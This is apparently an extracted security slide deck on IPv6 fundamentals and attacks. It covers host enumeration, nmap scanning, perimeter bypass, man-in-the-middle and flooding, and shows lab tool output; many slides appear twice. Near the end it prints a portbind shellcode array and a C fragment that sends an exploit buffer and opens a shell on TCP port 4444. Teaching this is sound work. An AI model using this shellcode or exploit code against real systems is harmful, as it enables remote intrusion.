ipv6 fundamentals & securities

IPv6 Fundamentals & Securities

Don AntoIPSECS.COM

Who?

• Don Anto• Information security manager• JNCIP-SEC, GSEC, GCIH, GCIA, GPEN, TOGAF• A dead security researcher• Involve in security field for almost 10 years• Genius evil thinker; professional troublemaker• @djantoxz

IPv6 - Why?

• Analog to digital convergence (E.G: Voice over IP)• The use of virtualization (E.G: Cloud)• Embedded devices (Smart phone, RFID) networking• All increase the needs of unique IP Address• So, more IP Address spaces are required!• Finally, IPv4 Address Exhaustion

IPv6 - What?

• The latest version of Internet Protocol (IP), and is intended to replace IPv4

• 128 bit IP Addressing, instead of 32 bit, to multiply IP address space

• IPv4 = 232 (4.294.967.296) >< IPv6 2128 (3.4×1038)• Not using dot decimal anymore, otherwise hexadecimal with

colon is used• E.G:

• 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092• 2001:470:0:64::2• fe80::1

IPv6 Fundamentals

• IPv6 header, 40 Bytes Fixed Length• Source address 16 bytes, destination address 16 bytes• 8 bytes for version, traffic class, flow label, payload length, next header, & hop limit

Source: Fernando Gont Presentation

IPv6 Fundamentals

• IPv6 Address Type: • Loopback • Unspecified • Multicast • Anycast• Local unicast • Global unicast

• Subneting• Routing


v4 >< v6


v4 to v6

• Dual-Stack system to support IPv4 & IPv6 concurrently• Tunneling mechanism to encapsulate IPv6 inside IPv4

• 6to4, 6in4, Teredo, ISATAP• Network Address Translation (NAT)

• Network Address Translation – Protocol Translation (NAT-PT)• Network Address Translation – IPv6 IPv4 (NAT-64)

• Free IPv6 Tunnel Broker?

Security Issues

• Large space of IPv6 address (enumeration, scanning, managing)• The use of tunneling? The use of dual-stack networking?• Weakness in IPv6 itself? (protocol level vulnerabilities)• Weakness of Application ran on IPv6

Enumeration• Discovery through multicast address (FF02::1)• Discovery through ICMPv6 Echo Request• Discovery through DNS Query (A >< AAAA)• Discovery through SNMP Query• Google helps us to find IPv6 domains• The presence of IPAM may be help

ipv6lab ->./alive6 eth4Alive: dead:beaf::3Alive: dead:beaf::1Found 2 systems alive

ipv6lab ->./alive6 eth4Alive: dead:beaf::3Alive: dead:beaf::1Found 2 systems alive

ipv6lab->ping6 -I eth4 ff02::1PING ff02::1(ff02::1) from fe80::a00:27ff:fe39:6f0a eth4: 56 data bytes64 bytes from fe80::a00:27ff:fe39:6f0a: icmp_seq=1 ttl=64 time=0.034 ms64 bytes from fe80::a00:27ff:fe96:da90: icmp_seq=1 ttl=64 time=1.70 ms (DUP!)64 bytes from fe80::a00:27ff:fe6c:ea37: icmp_seq=1 ttl=64 time=2.58 ms (DUP!)ipv6lab->ip -6 neigh showfe80::a00:27ff:fe96:da90 dev eth4 lladdr 08:00:27:96:da:90 REACHABLEfe80::a00:27ff:fe6c:ea37 dev eth4 lladdr 08:00:27:6c:ea:37 REACHABLE

ipv6lab->ping6 -I eth4 ff02::1PING ff02::1(ff02::1) from fe80::a00:27ff:fe39:6f0a eth4: 56 data bytes64 bytes from fe80::a00:27ff:fe39:6f0a: icmp_seq=1 ttl=64 time=0.034 ms64 bytes from fe80::a00:27ff:fe96:da90: icmp_seq=1 ttl=64 time=1.70 ms (DUP!)64 bytes from fe80::a00:27ff:fe6c:ea37: icmp_seq=1 ttl=64 time=2.58 ms (DUP!)ipv6lab->ip -6 neigh showfe80::a00:27ff:fe96:da90 dev eth4 lladdr 08:00:27:96:da:90 REACHABLEfe80::a00:27ff:fe6c:ea37 dev eth4 lladdr 08:00:27:6c:ea:37 REACHABLE

ipv6lab->host -t A www.jp.freebsd.orgwww.jp.freebsd.org has address 119.245.129.228ipv6lab->host -t AAAA www.jp.freebsd.orgwww.jp.freebsd.org has IPv6 address 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092

ipv6lab->host -t A www.jp.freebsd.orgwww.jp.freebsd.org has address 119.245.129.228ipv6lab->host -t AAAA www.jp.freebsd.orgwww.jp.freebsd.org has IPv6 address 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092

Scanning

• Port Scanning (Tools with IPv6 support)• Vulnerability Scanning (Tools with IPv6 support)

ipv6lab->nmap -6 -sV -PN -T4 dead:beaf::3

Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WITInteresting ports on dead:beaf::3:Not shown: 999 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 5.9 (protocol 2.0)

ipv6lab->nmap -sV -PN -T4 192.168.137.103

Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WITInteresting ports on 192.168.137.103:Not shown: 998 closed portsPORT STATE SERVICE VERSION21/tcp open ftp?22/tcp open ssh OpenSSH 5.9 (protocol 2.0)MAC Address: 08:00:27:6C:EA:37 (Cadmus Computer Systems)

ipv6lab->nmap -6 -sV -PN -T4 dead:beaf::3

Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WITInteresting ports on dead:beaf::3:Not shown: 999 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 5.9 (protocol 2.0)

ipv6lab->nmap -sV -PN -T4 192.168.137.103

Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WITInteresting ports on 192.168.137.103:Not shown: 998 closed portsPORT STATE SERVICE VERSION21/tcp open ftp?22/tcp open ssh OpenSSH 5.9 (protocol 2.0)MAC Address: 08:00:27:6C:EA:37 (Cadmus Computer Systems)

v4 to v6 proxy is usually helpful E.G: Socatapt-get install socat

Perimeter Defense Bypass

• Does Firewall protect both IPv4 and IPv6 network?• Does IDS/IPS protect both IPv4 and IPv6 network?• TEREDO tunneling can be used to bypass NAT and to

compromise internal network• The use of dual stack and tunneling mandates the protection

for IPv4 and IPv6

Perimeter Defense Bypass

• IPv4 is well governed by firewall using NAT or policies• Poor firewall configuration is potentially used to bypass access using IPv6 network to DMZ• Even worse, someone may directly access the internal network from internet

Exploiting - Protocols

• IPv6 also designed to increase security of IPv4, unfortunately there is no significant improvement

• Some problems in IPv4 is still persistent in IPv6• Man In The Middle Attack• Denial of Services Attack• More and more

Man In The Middle• Spoofed ICMP Neighbor Advertisement (replacing ARP in v4)• Spoofed ICMP Router Advertisement• Spoofed ICMP Redirect or ICMP Toobig to implant routing• Rogue DHCPv6 Server (replacing DHCP server in v4)• More and more

Used to help packet sniffing

Source Image: OWASP website

Denial of Services

• Traffic flooding with ICMPv6 RA, NA, NS, MLD, Smurfing• Prevent new IPv6 address with DAD• CPU Exhaustion with ICMPv6 NS and a lot of crypto stuff• Routing loop attack utilizes automatic tunneling• ICMP attack against TCP to tear down BGP session

anto# ifstat -beth0

Kbps in Kbps out9851.48 1.0810244.34 0.9510313.33 0.959165.56 0.959358.11 0.9510165.01 0.959802.98 0.959353.34 0.95

anto# ifstat -beth0

Kbps in Kbps out9851.48 1.0810244.34 0.9510313.33 0.959165.56 0.959358.11 0.9510165.01 0.959802.98 0.959353.34 0.95

anto# tcpdump -n -i eth0 dst host dead:beaf::3

20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 2420:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 2420:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 2420:39:48.442337 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 2420:39:48.442585 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24

4700 packets captured4884 packets received by filter93 packets dropped by kernel

anto# tcpdump -n -i eth0 dst host dead:beaf::3

20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 2420:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 2420:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 2420:39:48.442337 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 2420:39:48.442585 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24

4700 packets captured4884 packets received by filter93 packets dropped by kernel

Exploiting - Apps

• Buffer Overflow• Remote Format String• Off-By-One• Web App Attacks• More Attacks?!• There’s no big difference• Socket programming &

shellcodes

char shellcode[] = /*Portbind @ 4444*/"\xd9\xcc\xbd\x59\x34\x55\x97\xd9\x74\x24\xf4\x5a\x29\xc9""\xb1\x17\x31\x6a\x19\x83\xc2\x04\x03\x6a\x15\xbb\xc1\x64""\x4c\x68\x69\xd4\x18\x84\xe4\x3b\xb6\xfe\xae\x76\xc7\x68""\xd7\xdb\x9a\xc6\xba\x89\x48\x80\x52\x3f\x31\x2a\xcb\x35""\xc9\x3b\xea\x20\xd5\x6a\xbb\x3d\x04\xcf\x29\x58\x9f\x02""\x2d\x14\x79\x2f\x2a\x98\x06\x1d\x61\x74\x8e\x40\xc6\xc8""\xf6\x4f\x49\xbb\xae\x25\x75\xe4\x9d\x39\xc0\x6d\xe6\x51""\xfc\xa2\x65\xc9\x6a\x92\xeb\x60\x05\x65\x08\x22\x8a\xfc""\x2e\x72\x27\x32\x30";

char shellcode[] = /*Portbind @ 4444*/"\xd9\xcc\xbd\x59\x34\x55\x97\xd9\x74\x24\xf4\x5a\x29\xc9""\xb1\x17\x31\x6a\x19\x83\xc2\x04\x03\x6a\x15\xbb\xc1\x64""\x4c\x68\x69\xd4\x18\x84\xe4\x3b\xb6\xfe\xae\x76\xc7\x68""\xd7\xdb\x9a\xc6\xba\x89\x48\x80\x52\x3f\x31\x2a\xcb\x35""\xc9\x3b\xea\x20\xd5\x6a\xbb\x3d\x04\xcf\x29\x58\x9f\x02""\x2d\x14\x79\x2f\x2a\x98\x06\x1d\x61\x74\x8e\x40\xc6\xc8""\xf6\x4f\x49\xbb\xae\x25\x75\xe4\x9d\x39\xc0\x6d\xe6\x51""\xfc\xa2\x65\xc9\x6a\x92\xeb\x60\x05\x65\x08\x22\x8a\xfc""\x2e\x72\x27\x32\x30";

for(AI=AddrInfo;AI!=NULL;AI=AI->ai_next){if((s=socket(AI->ai_family,AI->ai_socktype,AI->ai_protocol))<0){printf("can't create socket\n");exit(0);

}connect(s,AI->ai_addr,AI->ai_addrlen);send(s,buffer,len,0);printf("Check your shell on %s TCP port 4444\n",argv[1]);

}

for(AI=AddrInfo;AI!=NULL;AI=AI->ai_next){if((s=socket(AI->ai_family,AI->ai_socktype,AI->ai_protocol))<0){printf("can't create socket\n");exit(0);

}connect(s,AI->ai_addr,AI->ai_addrlen);send(s,buffer,len,0);printf("Check your shell on %s TCP port 4444\n",argv[1]);

}

v4 to v6 proxy is usually helpful E.G: Socatapt-get install socat

Discussion

Thank You

ipv6 fundamentals & securities

Documents

ipv4 ipv6

ipv6 network

new ipv6 address

ipv6 man

ipv6 fundamentalssource

ipv6 domains

protocols ipv6

ipv4 address exhaustion